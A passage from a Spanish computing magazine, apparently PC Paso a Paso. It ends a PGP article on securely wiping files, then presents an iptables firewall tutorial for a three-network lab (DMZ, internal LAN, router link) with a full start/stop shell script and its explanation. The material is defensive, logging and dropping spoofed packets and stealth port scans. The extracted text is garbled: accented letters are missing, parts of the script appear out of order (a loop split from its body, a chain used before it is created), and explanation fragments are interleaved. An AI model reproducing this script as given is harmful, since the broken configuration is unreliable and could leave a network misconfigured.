Ha llegado el momento de hablar de una de las opciones ms tiles de PGP y que, de hecho, no est relacionada con la criptografa ni con las claves... pero que no podis perderos y no quera dejar de comentar. Como ya dije antes, no basta con borrar un fichero para que ste desaparezca del disco duro. Podemos imaginar nos el disco duro como un enorme libro que tiene un ndice y unos contenidos. Cuando escribimos un algo (un fiche ro), estamos escribiendo algo en alguna pgina e introdu ciendo en el ndice una entrada donde indicamos la posicin de esa informacin para saber que est ocupada. Al borrar un fichero, el sistema operativo en realidad lo que hace es borrar el ndice, decir que ese espacio est li bre para ser usado si es necesario... pero no borra la informacin realmente. Seguramente ya habris pensado la mayora que bastara entonces con sobreescribir la informacin real para elimi nar los datos. S y no. S porque as realmente desapare cera la informacin, pero no por varios motivos: en primer lugar, un usuario desde el sistema operativo normalmente no tiene posibilidad de controlar el disco hasta tal punto como para escribir los clusters exactos donde se alojaba la informacin; y en segundo lugar porque aunque so breescribamos la informacin, sta podra ser recuperada bajo ciertas circunstancias. La mayora sabris que un disco duro es un dispositivo magntico y que la informacin se guarda como bits mag netizados. Estos bits generan millones de mini-campos magnticos. Si habis estudiado fsica elctrica, sabris que al aplicar un mismo campo (por ejemplo, si queremos escribir un 1) a dos zonas donde los campos no son los mismos (por ejemplo, dos bits donde haba 1 y 0 respecti vamente), los campos resultantes no son idnticos. Dado que el ordenador trabaja con unos mrgenes de error (po

Para utilizar esta herramienta simplemente debemos selec cionar el/los fichero/s a borrar de forma segura y pulsar con el botn derecho en ellos, seleccionar el men PGP y la opcin Wipe. Un dilogo de confirmacin aparecer antes de llevar a cabo la accin (este dilogo puede elimi narse... pero no lo recomiendo en ningn caso): conviene estar muy seguro antes de decir s... porque cualquier cosa borrada con Wipe ser totalmente irrecuperable.

Hemos terminado con el primer artculo de este Taller de Criptografa. Espero que os haya resultado interesante y que a partir de ahora incorporis PGP a vuestros sistemas como un elemento imprescindible... Hasta el prximo nmero, con GnuPG. Ramiro C.G. (alias Death Master) Dedicado a Laura

29/68

Proteccin con iptables en una red corporativa

La realizacin de este artculo me ha planteado un gran dilema, pero al final me he decidido a hacerlo, por ser fiel a mis planes iniciales. El problema es que, desde que empec el curso de TCP/IP (all por el nmero 17), tena una idea de la estructura que iba a seguir el curso, y de las cosas que quera contar. Dentro de ese plan entraba el dedicar un artculo a las iptables una vez que terminase de ex plicar toda la teora del protocolo IP y todos los que tiene por encima (TCP, UDP, e ICMP). Pero claro, no contaba con que ste es un tema tan interesante, que la probabilidad de que alguien se me adelantase era bastante alta. Y con lo que tampoco contaba era que, para colmo, el curso de firewalls se desarrollase de una forma tan magnfica y completa, as que desde aqu mis felicitaciones para Vic_Thor. Dando vueltas al asunto llegu a la conclusin de que, si saba aprovechar la situacin, podra ser una ventaja ms que un obstculo para mis planes. Poda aprovechar que Vic_Thor ya os dio toda la base necesaria para comprender las iptables y, por tanto, poda ir directamente al meollo del asunto sin tener que escribir tropecientas pginas explicando detalles de las iptables que, en reali dad, se salen de la temtica del curso de TCP/IP. Por tanto, si consigo mis objetivos con este artculo, habremos conseguido una combinacin perfec ta: un curso de firewalls para explicar el funcionamiento de las iptables, y un curso de TCP/IP que aprovecha esos conocimientos para aplicarlos a lo explicado en el curso. Lo que no os puedo prometer es que este artculo sea complementario al curso de diseo de firewa lls, ya que no puedo ir tachando todo lo que ya ha sido contado para contar slo cosas nuevas, pues el artculo quedara totalmente inconexo y perdera toda su utilidad. As que podis tomarlo de dos formas: para los que no seguisteis el curso de firewalls, ser esta vuestra segunda oportunidad para conocer este apasionante tema en profundidad, y para los que s lo seguisteis, tenis aqu un nuevo punto de vista sobre el mismo tema. Este nuevo punto de vista consistir en ir repasando todo lo explicado a lo largo del curso de TCP/IP, y tambin algunas cosas de la veterana serie RAW, y aplicando lo que vimos entonces al diseo de un firewall completo, de arriba a abajo, que implemente proteccin para prcticamente todos los ataques que he ido explicando durante casi 2 aos (ya he perdido la cuenta de cuanto tiempo llevo en la revista...).
30/68

Proteccin con iptables en una red corporativa

Ya que de esto se encarg el curso de firewalls, no os voy a ir presentando una serie de escenarios, empezando por el ms sencillo para ir complicando cada vez ms la cosa. Directamente os voy a plantear un escenario complicado y terminamos antes, jeje. Os voy a plantear un escenario muy tpico en cualquier corporacin, pero no tan tpico en un ambiente domstico. An as, el montaje que tengo yo en mi propia casa es bas tante parecido al que voy a plantear (aunque no exactamen te igual, ya que tampoco me gusta revelar los detalles inter nos de mi red a todo el planeta), por lo que es perfectamente viable para un usuario normal que, ms que dinero (ya que de eso no me sobra precisamente), lo que tenga sean las su ficientes ganas. Hoy da es muy habitual tener 2 pcs: el pc viejo que utilizaste hasta hace x aos, y el pc relativamente nuevo que es el que utilizas normalmente. Para hacerse con ms ordenadores puedes optar por varias opciones. Puedes ir como un buitre detrs de tus amigos, o familiares, en espera de que alguien se deshaga de algn PC viejo, o de que la empresa en la que trabaje alguien renueve los equipos informticos (ste es el gran chollo). Otra opcin es comprar algn PC cutre de segunda mano por cuatro duros. Y por ltimo, la opcin ms cutre de todas, pe ro tambin quiz la ms divertida, es dedicarte a buscar en los contenedores, jeje. No se como ser en otras ciudades, u otros barrios, as que lo mismo es que yo tengo mucha suerte por vivir donde vivo. Pero el caso es que por donde yo me muevo (cierto barrio de Madrid) es bastante habitual encontrar restos de PCs aban donados por las calles, llorando y diciendo: yo nunca lo ha ra. Cuando digo habitualmente podra decir que ms o menos la media es de una vez al mes. Hay meses que increblemen te me puedo encontrar un hallazgo cada fin de semana (los fines de semana suele ser ms habitual, no se bien por qu), y luego pasar varios meses sin encontrar absolutamente na da. Si habis encontrado alguno de estos hallazgos y habis sido lo suficientemente cutres (como yo) como para pararos a mi rar si hay algo aprovechable, probablemente la mayora de las veces habris comprobado que los restos han sido muti lados, llevndose cualquier parte interesante (CPU, memoria, tarjetas que cuesten ms de 20 euros, etc). Pero, an as, muchas veces se encuentran autnticos yaci mientos que son como minas que requieren hasta maquina ria para ser explotadas . Nunca olvidar aquella ocasin en la que pas por enfrente de una oficina del INEM y descubr un contenedor entero lleno de material informtico. Rpidamente, llamada al mvil de m hermano para que vi niese con el coche. Pero antes de que llegase mi hermano apareci un to con una furgoneta y empez a cargar todo lo rpido que poda, mientras yo iba sacando como poda cualquier cosa que en contrase aprovechable hasta que llegasen los refuerzos. De aquella oportunidad nica, aparte de varias broncas de mi madre y la novia de mi hermano, sali material para abastecer a varias personas (que si no se quin quiere un teclado, que si este monitor cutre para no se cuantos...). Resumiendo, que si realmente te lo curras, a pesar de que no tengas un duro, tu principal limitacin a la hora de montar una red de estas caractersticas ya no ser la falta de equi pos, si no, como en mi caso, la falta de espacio y (tambin hay que tenerlo en cuenta) el incremento en la cuenta de Iberdrola que supondr tener todas esas mquinas encendi das 24 horas (eso s, por lo menos lo que gastas en electrici dad luego te lo puedes ahorrar en calefaccin). Pero bueno, ya estoy otra vez contando mi vida. Vamos a ver en primer lugar con una imagen el escenario que estamos planteando:

Como vemos, en el escenario aparecen 4 redes: La primera red es, por supuesto, Internet. Esta red cons ta de una nubecita llena de millones de mquinas, de las cuales una de ellas es nuestro router ADSL, llamado Zeus. La segunda red est formada por slo dos mquinas: Zeus, y nuestro firewall, llamado Cerbero. Como segura mente sabris, Cerbero era el perro infernal que guardaba las puertas del Hades, el reino de los muertos de los anti guos griegos. Al igual que el can Cerbero, nuestro Cerbero tiene 3 ca bezas, cada una de ellas conectada a una red, y se encar ga tambin de vigilar la entrada de cada reino, para que los vivos no se junten con los muertos, ni los muertos con los vivos.

31/68

Proteccin con iptables en una red corporativa

A esta red que une a Zeus y Cerbero la llamaremos Olimpo. La tercera red est formada de momento por slo dos m quinas: Cerbero, y un servidor web al que hemos llama do Persefone. Esta red es, por supuesto, una DMZ, ya que aqu es donde se encuentran nuestros servidores. Cualquier otro servidor que quisiramos poner (de correo, de dns, etc) tendramos que ubicarlo aqu. A esta red, la DMZ, la llamaremos Hades. La cuarta y ltima red es nuestra red interna, y est for mada de momento por 3 mquinas: Cerbero, y dos PCs llamados Eolo y Poseidon. A esta red, la red interna, la llamaremos Gaia. Y a qu viene esta tontera de poner nombres a las m quinas y a las redes? El que pregunte esto probablemente nunca habr tenido que manejar redes con ms de dos mquinas. Cuando diseas una red lo tienes que hacer siempre en previsin de que sta pueda crecer y cambiar. Con respecto al primer punto (el crecimiento de la red), sera absurdo llamar a las mquinas: SERVIDOR, FIREWALL, ROUTER, y PC. En cuanto aadisemos otro servidor, otro router, o cualquier otro elemento a la red, ya empezara a haber ambigedades que terminaran con tribuyendo al caos que ya es de por s el mantener una red corporativa. Y con respecto al segundo punto (los cambios en la red) os puedo hablar de mi propia experiencia en una empresa en la que trabaj como administrador de sistemas. En principio se opt (yo no trabajaba all por aquel entonces) por llamar a cada PC con el nombre del empleado que lo utilizaba. Al cabo de unos aos, casi la mitad de la plantilla haba cambiado, y tenamos a un hombre barbudo traba jando con un PC llamado Rosita, y eso al final tambin ter minaba causando cierta confusin, como imaginaris. Y vamos, si tu duda es ya que cul es la necesidad de po ner nombres, sean cuales sean, entonces imagnate lo que puede ser realizar cualquier configuracin o depuracin de la red con varias mquinas llamadas todas con nmeros como 192.168.34.15. Es exactamente lo mismo que ocurre con los DNS que utilizamos en Internet, de cuya utilidad no creo que nadie dude. Resumiendo, mi consejo es que utilicis nombres que sean hasta cierto punto significativos, pero no dependientes del contexto, pues ste podra cambiar. El ejemplo que planteo aqu de los dioses griegos me parece una opcin muy bue na, y como otro ejemplo tenis el que uso yo actualmente, que son nombres de estrellas para las mquinas, y de constelaciones para las redes. Tenis incluso un RFC dedicado a la eleccin de nombres para redes. Este es el RFC 1178, y lo tenis traducido al castellano en http://www.rfc-es.org/getfile.php?rfc=1178. Como podemos deducir por la imagen, la red Olimpo est definida por las direcciones 192.168.1.0/24. La red Hades por las direcciones 192.168.2.0/24, y la red Gaia por las direcciones 192.168.3.0/24. Por supuesto, la primera red, que es Internet, tiene sus propias direcciones, entre las cuales se encuentra la 80.15.13.100, que es la direccin IP de Zeus de cara a Internet (Zeus tendr otra IP, que ser la que tenga en la red Olimpo). Para quien no le haya quedado claro, la mscara de red para las 3 redes, Olimpo, Hades, y Gaia, es 255.255.255.0. Tambin vemos en la imagen que Cerbero tiene 3 tarjetas de red: eth0, eth1, y eth2. La tarjeta eth0 es la que co necta a Cerbero con la red Hades, la tarjeta eth1 conecta a Cerbero con la red Olimpo, y la tarjeta eth2 conecta a Cerbero con la red Gaia. Nos vamos a centrar nicamente en la configuracin de la m q u i n a m s i m p o r t a n t e d e l e s c e n a r i o, q u e s e r a Cerbero. A lo largo del artculo iremos recordando lo que he ido explicando en la serie RAW y en el curso de TCP/IP, y aplicando estos conocimientos a la configuracin de Cerbero. Os muestro aqu la configuracin completa de IPTABLES de Cerbero, e iremos recorriendo esta configuracin a lo largo de todo el artculo: #! /bin/sh ################################## # IPTABLES CERBERO # ~~~~~~~~~~~~~~~~ # Curso de TCP/IP. # Revista PC PASO A PASO. # # PyC (LCo). Diciembre 2004. # # Este script de iptables ha sido # realizado exclusivamente para # la revista PC PASO A PASO. # Eres libre de utilizarlo o # modificarlo a tu antojo. :-) ################################## ########################### # DEFINICION DE VARIABLES ########################### ServidorDNS=193.15.25.1 #################### # DIOSES (MAQUINAS) Zeus_Internet=80.15.13.100 # OLIMPO Zeus=192.168.1.2 Cerbero_Olimpo=192.168.1.1

32/68

Proteccin con iptables en una red corporativa

# HADES Persefone=192.168.2.2 Cerbero_Hades=192.168.2.1 # GAIA Eolo=192.168.3.2 Poseidon=192.168.3.3 Cerbero_Gaia=192.168.3.1 ################# # REINOS (REDES) hades=eth0 olimpo=eth1 gaia=eth2 #################################### case "$1" in restart) $0 stop $1 start ;; stop) iptables -F iptables -X iptables -Z iptables -t nat -F ;; status) iptables --list ;; start) #################################### # BORRAMOS LA CONFIGURACION ACTUAL DE IPTABLES #################################### iptables -F iptables -X iptables -Z iptables -t nat -F ######################## # CONFIGURACION GENERAL ######################## # incluimos modulo para FTP modprobe ip_conntrack_ftp # Habilitamos el forward de paquetes echo 1 > /proc/sys/net/ipv4/ip_forward # Habilitamos proteccion anti-spoofing for f in /proc/sys/net/ipv4/conf/*/rp_filter # Creamos reglas de bloqueo iptables --insert FORWARD 1 -j DROP iptables --insert INPUT 1 -j DROP iptables --insert OUTPUT 1 -j DROP # Configuramos la politica por defecto iptables --policy FORWARD DROP iptables --policy INPUT DROP iptables --policy OUTPUT DROP ############################ # HABILITAMOS TRAFICO LOCAL ############################ iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT #################################### # --- REGLAS --# #################################### ############ # TABLA NAT ############ # SERVIDOR FTP EN PERSEFONE iptables -t nat -A PREROUTING \ -p tcp --dport ftp -i $olimpo -j DNAT --to $Persefone # SERVIDOR WWW EN PERSEFONE iptables -t nat -A PREROUTING \ -p tcp --dport www -i $olimpo -j DNAT --to $Persefone # DCC PARA EOLO iptables -t nat -A PREROUTING \ -p tcp --dport 5000:5005 -i $olimpo -j DNAT --to $Eolo # DCC PARA POSEIDON iptables -t nat -A PREROUTING \ -p tcp --dport 5010:5015 -i $olimpo -j DNAT --to $Poseidon # EMULE PARA POSEIDON do echo 1 > $f done # Habilitamos proteccion anti-smurf echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts # Habilitamos proteccion contra source route spoofing echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route # Registramos marcianos para el proyecto SETI echo 1 > /proc/sys/net/ipv4/conf/all/log_martians #################################### # BLOQUEAMOS TODO MIENTRAS ESTAMOS CONFIGURANDO ####################################

33/68

Proteccin con iptables en una red corporativa

iptables -t nat -A PREROUTING \ -p tcp --dport 4662 -i $olimpo -j DNAT --to $Poseidon # ENMASCARAMIENTO HACIA EL EXTERIOR # ENMASCARAMIENTO PARA LA RED HADES iptables -t nat -A POSTROUTING \ -s 192.168.2.1/24 -o $olimpo -j SNAT --to $Cerbero_Olimpo # ENMASCARAMIENTO PARA LA RED GAIA iptables -t nat -A POSTROUTING \ -s 192.168.3.1/24 -o $olimpo -j SNAT --to $Cerbero_Olimpo ######################## # REGLAS DE USO GENERAL ######################## ############################# # CADENA DE REGLAS PARA ICMP iptables --new-chain reglas_icmp # PING iptables -A reglas_icmp -p icmp \ --icmp-type echo-reply -j ACCEPT # PONG iptables -A reglas_icmp -p icmp \ --icmp-type echo-request -j ACCEPT # PERMITIMOS PMTUD (DESTINATION UNREACHABLE) iptables -A reglas_icmp -p icmp \ --icmp-type destination-unreachable -j ACCEPT # PERMITIMOS TRACEROUTE (TIME EXCEEDED) iptables -A reglas_icmp -p icmp \ --icmp-type time-exceeded -j ACCEPT # LOGEAMOS Y RECHAZAMOS CUALQUIER OTRO ICMP iptables -A reglas_icmp -p icmp \ --j LOG --log-prefix "ICMP: " iptables -A reglas_icmp -p icmp -j DROP ################################## # CADENA PARA ESTADOS DE CONEXION iptables --new-chain keep_state # MANTENEMOS CONEXIONES ESTABLECIDAS iptables -A keep_state -m state \ --state RELATED,ESTABLISHED -j ACCEPT # RECHAZAMOS CONEXIONES INVALIDAS iptables -A keep_state -m state \ --state INVALID -j DROP ################################# # CADENA PARA ANALIZAR FLAGS TCP iptables --new-chain flags_tcp # RECHAZAMOS Y LOGEAMOS ESCANEO NMAP-XMAS # SERVICIOS QUE DA PERSEFONE A LA RED GAIA iptables -A gaia_hades -d $Persefone -p tcp --dport www -j ACCEPT iptables -A gaia_hades -d $Persefone -p tcp --dport ftp -j ACCEPT # SERVICIOS QUE DA PERSEFONE SOLO A EOLO iptables -A gaia_hades -d $Persefone \ -p tcp --dport ssh -s $Eolo -j ACCEPT # RECHAZAMOS Y LOGEAMOS CUALQUIER OTRO TRAFICO iptables -A gaia_hades -j LOG --log-prefix "GAIA->HADES: " iptables -A gaia_hades -j DROP ################################### # RECHAZAMOS Y LOGEAMOS ESCANEO SYN/RST iptables -A flags_tcp -p tcp --tcp-flags SYN,RST SYN,RST \ -m limit --limit 5/minute -j LOG --log-prefix "SYN/RST SCAN: " iptables -A flags_tcp -p tcp --tcp-flags SYN,RST SYN,RST -j DROP # RECHAZAMOS Y LOGEAMOS ESCANEO SYN/FIN iptables -A flags_tcp -p tcp --tcp-flags SYN,FIN SYN,FIN \ -m limit --limit 5/minute -j LOG --log-prefix "SYN/FIN SCAN: " iptables -A flags_tcp -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # RECHAZAMOS Y LOGEAMOS ESCANEO PSH/FIN iptables -A flags_tcp -p tcp --tcp-flags PSH,FIN PSH,FIN \ -m limit --limit 5/minute -j LOG --log-prefix "PSH/FIN SCAN: " iptables -A flags_tcp -p tcp --tcp-flags PSH,FIN PSH,FIN -j DROP # RECHAZAMOS Y LOGEAMOS EL NULL SCAN iptables -A flags_tcp -p tcp --tcp-flags ALL NONE \ -m limit --limit 5/minute -j LOG --log-prefix "NULL SCAN: " iptables -A flags_tcp -p tcp --tcp-flags ALL NONE -j DROP ################################## # ESTAS CADENAS SE APLICAN A TODO iptables -A FORWARD -p tcp -j keep_state iptables -A INPUT -p tcp -j keep_state iptables -A OUTPUT -p tcp -j keep_state iptables -A FORWARD -p tcp -j flags_tcp iptables -A INPUT -p tcp -j flags_tcp iptables -A OUTPUT -p tcp -j flags_tcp iptables -A FORWARD -p icmp -j reglas_icmp iptables -A INPUT -p icmp -j reglas_icmp iptables -A OUTPUT -p icmp -j reglas_icmp ################################### # CADENA DE REGLAS DE GAIA A HADES ################################### # INTERNA -> DMZ iptables --new-chain gaia_hades iptables -A FORWARD -i $gaia -o $hades -j gaia_hades iptables -A flags_tcp -p tcp --tcp-flags ALL FIN,URG,PSH \ -m limit --limit 5/minute -j LOG --log-prefix "NMAP-XMAS SCAN: " iptables -A flags_tcp -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP

34/68

Proteccin con iptables en una red corporativa

# CADENA DE REGLAS DE HADES A GAIA ################################### # DMZ -> INTERNA iptables --new-chain hades_gaia iptables -A FORWARD -i $hades -o $gaia -j hades_gaia # RECHAZAMOS Y LOGEAMOS TODO! iptables -A hades_gaia -j LOG --log-prefix "HADES->GAIA: " iptables -A hades_gaia -j DROP ##################################### # CADENA DE REGLAS DE HADES A OLIMPO ##################################### # DMZ -> INTERNET iptables --new-chain hades_olimpo iptables -A FORWARD -i $hades -o $olimpo -j hades_olimpo # PERMITIMOS TODO EL TRAFICO HACIA EL EXTERIOR iptables -A hades_olimpo -j ACCEPT ##################################### # CADENA DE REGLAS DE OLIMPO A HADES ##################################### # INTERNET -> DMZ iptables --new-chain olimpo_hades iptables -A FORWARD -i $olimpo -o $hades -j olimpo_hades # PERMITIMOS DNS iptables -A olimpo_hades -s $ServidorDNS \ -p udp --sport domain -j ACCEPT # SERVICIOS QUE OFRECE HADES A INTERNET iptables -A olimpo_hades -p tcp --dport www -j ACCEPT iptables -A olimpo_hades -p tcp --dport ftp -j ACCEPT # RECHAZAMOS Y LOGEAMOS EL RESTO DEL TRAFICO iptables -A olimpo_hades -j LOG --log-prefix "OLIMPO->HADES: " iptables -A olimpo_hades -j DROP #################################### # CADENA DE REGLAS DE GAIA A OLIMPO #################################### # INTERNA -> INTERNET iptables --new-chain gaia_olimpo iptables -A FORWARD -i $gaia -o $olimpo -j gaia_olimpo # ACEPTAMOS TODO EL TRAFICO HACIA INTERNET iptables -A gaia_olimpo -j ACCEPT #################################### # CADENA DE REGLAS DE OLIMPO A GAIA #################################### # INTERNET -> INTERNA iptables --new-chain olimpo_gaia iptables -A FORWARD -i $olimpo -o $gaia -j olimpo_gaia # PERMITIMOS DNS iptables -A olimpo_gaia -s $ServidorDNS \ -p udp --sport domain -j ACCEPT # PERMITIMOS DCC A EOLO iptables -A olimpo_gaia -d $Eolo \ -p tcp --dport 5000:5005 -j ACCEPT # PERMITIMOS DCC A POSEIDON iptables -A olimpo_gaia -d $Poseidon \ -p tcp --dport 5010:5015 -j ACCEPT # PERMITIMOS EMULE A POSEIDON iptables -A olimpo_gaia -d $Poseidon \ -p tcp --dport 4662 -j ACCEPT # RECHAZAMOS Y LOGEAMOS TODO LO DEMAS iptables -A olimpo_gaia -j LOG --log-prefix "OLIMPO->GAIA: " iptables -A olimpo_gaia -j DROP ######################################## # REGLAS PARA EL PROPIO CERBERO (INPUT) ######################################## iptables --new-chain olimpo_cerbero iptables --new-chain hades_cerbero iptables --new-chain gaia_cerbero iptables -A INPUT -i $olimpo -j olimpo_cerbero iptables -A INPUT -i $hades -j hades_cerbero iptables -A INPUT -i $gaia -j gaia_cerbero ################# # OLIMPO_CERBERO ####################### # INTERNET -> FIREWALL # PERMITIMOS DNS iptables -A olimpo_cerbero -s $ServidorDNS \ -p udp --sport domain -j ACCEPT # RECHAZAMOS Y LOGEAMOS EL RESTO DEL TRAFICO iptables -A olimpo_cerbero -j LOG --log-prefix "OLIMPO->CERBERO: " iptables -A olimpo_cerbero -j DROP ################ # HADES_CERBERO ################## # DMZ -> FIREWALL # RECHAZAMOS Y LOGEAMOS TODO! iptables -A hades_cerbero -j LOG --log-prefix "HADES->CERBERO: " iptables -A hades_cerbero -j DROP ############### # GAIA_CERBERO ###################### # INTERNA -> FIREWALL

35/68

Proteccin con iptables en una red corporativa

# RECHAZAMOS Y LOGEAMOS TODO! iptables -A gaia_cerbero -j LOG --log-prefix "GAIA->CERBERO: " iptables -A gaia_cerbero -j DROP ######################################### # REGLAS PARA EL PROPIO CERBERO (OUTPUT) ######################################### # PERMITIMOS LA SALIDA DE CONSULTAS DNS iptables -A OUTPUT -o $olimpo -d $ServidorDNS \ -p udp --dport domain -j ACCEPT # RECHAZAMOS Y LOGEAMOS EL RESTO DEL TRAFICO iptables -A OUTPUT -j LOG --log-prefix "OUTPUT: " iptables -A OUTPUT -j DROP ######################### # NOS PONEMOS EN MARCHA! ######################### iptables -D INPUT 1 iptables -D FORWARD 1 iptables -D OUTPUT 1 ;; *) echo "Uso: $0 {start|stop|restart|status}" exit 1 ;; esac A la vista de estas iptables, podemos deducir que los ser vicios de cada mquina sern: Persefone: Ofrece servidor www y ftp tanto a Internet como a la red Gaia. Ofrece servidor ssh para administracin remota slo para Eolo. Tiene acceso total a Internet. Solo tiene limitado el acceso desde Internet. Responde a un conjunto mnimo de mensajes ICMP. Cerbero: Su nica comunicacin con cualquier red son las consultas al servidor DNS, y respuesta a un conjunto mnimo de mensajes ICMP. Eolo: Tiene acceso total hacia Internet, pero muy restringi do desde Internet. Tiene acceso a Persefone como cliente ssh, para ad ministrar remotamente el servidor web. Tiene abiertos 6 puertos para DCC, ya que el usuario de Eolo quiere utilizar IRC. Responde a un conjunto mnimo de mensajes ICMP. 36/68 Ahora que ya hemos visto a grandes rasgos el escenario, vamos a ir analizando paso a paso todas las lneas de es tas iptables. Poseidon: Tiene acceso total hacia Internet, pero muy restringi do desde Internet. El usuario de Poseidon utiliza emule. Tiene abiertos 6 puertos para DCC, ya que el usuario de Poseidon quiere tambin utilizar IRC. Responde a un conjunto mnimo de mensajes ICMP. Zeus: Es un router ADSL que hace NAT a todos los puertos que utilizarn todas las redes, para que los gestione Cerbero. Por tanto, la tabla NAT de Zeus ser parecida a esta:

En esta primera seccin del archivo de configuracin de ip tables vemos una serie de definiciones que nos sern tiles para todo el script. Podemos comprobar que algunos de los valores definidos no son usados luego en el script. An as, conviene definir los tambin, pues definimos as todo el contexto, y nos permitir hacer cualquier modificacin o ampliacin en el futuro sin tener que preocuparnos de si tenamos definido o no tal elemento que hasta el momento no habamos uti lizado.

Proteccin con iptables en una red corporativa

La primera lnea: ServidorDNS=193.15.25.1 Indica la direccin IP del servidor DNS que utilizamos (pro bablemente el que nos haya dado nuestro ISP). Normalmente, esta direccin IP, as como probablemente tambin las del resto de mquinas a las que nos referimos en el script, se encontrarn ya en la configuracin del sis tema. Concretamente, los servidores DNS los tendremos en /etc/resolv.conf, y el resto de mquinas en /etc/hosts. Depende de la decisin de cada administrador el incluir aqu o no todas estas variables. Si no las incluimos el script puede ser menos legible, al no tener en el propio script toda la informacin necesaria para ser interpretado. Como contrapartida, si las incluimos en el script tenemos el problema potencial de que en algn momento pueda ha ber incoherencia entre la informacin almacenada en /etc/hosts y el script de iptables. Yo personalmente prefiero incluir las definiciones en el pro pio script de iptables, a pesar de que estn ya definidas todas las mquinas en el sistema. Para los que prefiris no incluir las definiciones, simple mente tenis que eliminar el smbolo $ que precede a los nombres de mquinas en todo el script. Por ejemplo, la l nea: iptables -A olimpo_hades -s $ServidorDNS \ -p udp --sport domain -j ACCEPT Quedara: iptables -A olimpo_hades -s ServidorDNS \ -p udp --sport domain -j ACCEPT Como vemos, tambin incluyo definiciones para las 3 tar jetas de red: eth0, eth1, y eth2. Esto es fundamental, ya que la mejor forma de asegurarnos de por dnde estn cir culando los paquetes es utilizar como referencia el propio dispositivo fsico, es decir, la tarjeta de red. Si utilizsemos direcciones IP como referencia para identificar cada red, podramos ser engaados por algn tipo de spoofing (aun que tengamos proteccin contra IP-spoofing, como ya ve remos). status) ** acciones para la opcin status ** ;; start) ** acciones para la opcin start ** ;; *) ** acciones para cualquier otro valor ** ;; esac Como vemos, las acciones para cada opcin terminan con ;;, y toda la sentencia case termina con esac. Este archivo de configuracin de iptables no es ms que un script para la shell de Linux y, por tanto, puede utilizar toda la potencia del lenguaje de programacin de la shell. Aqu nosotros estamos implementando una funcin muy tpica en Linux, que consiste en poder pasar un parmetro a un comando a la hora de lanzarlo, para que acte de una forma u otra segn el parmetro. Veremos ahora una por una todas las opciones que hemos incluido en el script. RESTART) Como ya he dicho, un restart es tan simple como hacer un stop, y a continuacin un start. stop) ** acciones para la opcin stop ** ;; Las opciones que damos a nuestro comando de iptables son (suponiendo que el script se llama iptpyc): ./iptpyc stop : Borra toda la configuracin de ipta bles. ./iptpyc start : Configura las iptables con todas las reglas que hemos incluido en el script. ./iptpyc restart : Hace un stop y un start, reinician do as toda la configuracin de iptables. ./iptpyc status : Muestra la configuracin actual de iptables. Para implementar estos comandos hacemos un CASE sobre el parametro $1. En un script de shell el parmetro $0 es siempre el propio nombre del parmetro (en este caso ip tpyc), y el parmetro $1 es el primer parmetro que hay justo detrs del nombre del script. Un CASE es una sentencia condicional que, a la diferencia de un IF THEN ELSE, que slo permite seleccionar una opcin u otra segn dos posibles condiciones sobre la va riable de entrada (SI cumple, y NO cumple), el CASE nos permite seleccionar tantas condiciones como queramos. En este caso nuestro CASE considera las condiciones de que $1 sea stop, start, restart, status, o cualquier otra cosa que no sea ninguna de las anteriores. Es decir, tenemos 5 condiciones sobre la variable $1, por lo que la estructura bsica de nuestro CASE es la siguiente: case $1 in restart) ** acciones para la opcin restart ** ;;

37/68

Proteccin con iptables en una red corporativa

STOP) Esta opcin vaca toda la configuracin de iptables, tanto si fue previamente ejecutado nuestro script (con start), co mo si no. STATUS) Tan sencillo como llamar a la opcin --list del comando ip tables. *) Ahora os pido que bajis hasta el final del script para ver esta opcin, ya que tiene que ser incluida despus de to das las dems. Como vemos, si se introduce cualquier opcin que no sea una de las que reconoce nuestro script, mostraremos el t pico mensaje que indica al usuario las opciones disponi bles. START) Todo el resto del artculo est dedicado a la opcin de start, as que aqu viene la chicha. En realidad, el sitio adecuado para incluir cualquier mdulo sera el archivo /etc/modules, pero nosotros lo hemos incluido en el script de iptables, para que tengamos todo junto, y as tener una visin ms global. Por cierto, que ya que hablo de visin global, no estara de ms que os mostrase aqu tambin el resto de configuracin bsica de Cerbero: hostname Cerbero ifconfig eth0 192.168.2.1 netmask 255.255.255.0 ifconfig eth1 192.168.1.1 netmask 255.255.255.0 ifconfig eth2 192.168.3.1 netmask 255.255.255.0 route add default gw Zeus Con los comandos ifconfig estamos configurando las 3 tarjetas de red, asignando una IP y una mscara de red a cada una. Con el comando route estamos definiendo la ru ta por defecto hacia Zeus (lo que Windows llama puerta de enlace predeterminada). Pero, volviendo a nuestro script, vamos a ver ms sobre el mdulo que estamos cargando en Cerbero. Aqu es donde empezamos a echar la vista atrs, recor dando aquellos buenos tiempos de la serie RAW, y nos encontramos con los dos artculos que dediqu al protocolo FTP. Este es un buen momento para repasar esos articulillos y recordar el funcionamiento del FTP pasivo, y el no pasivo. Volved aqu cuando hayis hecho el repaso. Como ya sabemos (si hemos repasado la leccin), cada vez que un servidor FTP recibe un comando PASV ha de abrir dinmicamente un puerto para que el cliente se co necte a un nuevo canal de datos. Por otra parte, cada vez que un cliente lanza un comando PORT, ha de abrir din micamente un puerto para que el servidor se conecte y es tablezca un nuevo canal de datos. Si estamos utilizando iptables, estos mecanismos no po dran funcionar as por las buenas, como es lgico. Para que puedan funcionar tenemos que incluir el mdulo ip_conntrack_ftp, que se encarga de analizar el campo DATOS de los paquetes TCP/IP en busca de comandos PORT y PASV. Cuando encuentra uno de estos comandos, los interpreta, y abre dinmicamente los puertos que haya que abrir. Cuando no estamos seguros de lo que hace un mdulo de Linux siempre tenemos la posibilidad de analizar el cdigo fuente, cosa que de ninguna manera podemos hacer con Windows. Por eso Windows, mientras no libere su cdigo, seguir siendo un sistema oscuro a cuyos caprichos esta rn sujetos todos sus usuarios. En Linux siempre tienes la posibilidad de comprobar t mismo el funcionamiento de las cosas, o bien de que otro con ms conocimientos que t lo haga, y publique sus conclusiones en cualquier web o publicacin a la que tenga acceso todo el mundo.

Empezamos haciendo lo mismo que hace el comando stop, para empezar con una configuracin limpia sobre la que ir trabajando.

